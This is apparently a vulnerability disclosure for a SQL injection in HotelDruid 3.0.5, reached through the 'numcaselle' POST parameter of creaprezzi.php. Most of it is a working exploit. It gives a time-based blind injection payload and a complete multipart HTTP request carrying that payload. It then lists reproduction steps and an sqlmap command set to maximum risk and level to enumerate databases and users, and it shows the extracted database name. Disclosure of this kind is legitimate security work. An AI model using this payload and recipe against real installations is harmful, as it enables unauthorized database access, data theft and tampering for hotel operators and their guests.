Affected Version: hoteldruid version 3.0.5
Security Issue:
SQL injection via POST parameter numcaselle
URL: <http://localhost/hoteldruid/creaprezzi.php>
Method: POST
Vulnerable Parameter: numcaselle
Payload: 1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
Vulnerability Description:
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Process to reproduce:
1. Copy the HTTP Request below
2. Save the file as sqli.txt
3. Run the sqlmap command below to see the extracted data from the database
HTTP Request:
POST /hoteldruid/creaprezzi.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: <http://localhost/hoteldruid/>
Content-Length: 5575
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"
2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="numcaselle"
1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="tipotariffa"
tariffa1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo1"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo1"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo2"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo2"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo3"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo3"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo4"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo4"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo5"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo5"
2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo6"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo6"
2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo7"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo7"
2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo8"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo8"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo9"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo9"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo10"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo10"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo11"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo11"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo12"
2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo12"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo13"
2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo13"
2023-01-23
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13p"
1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo14"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo14"
2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14p"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica"
1
------------YWJkMTQzNDcw--
HTTP Response:
Proof of Exploit:
SQL query - SELECT database()
hoteldruid
Screenshot:
Command used: sqlmap -r sqli.txt -p numcaselle --risk 3 --level 5 --dbs --current-user --current-db
The impact of this vulnerability:
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.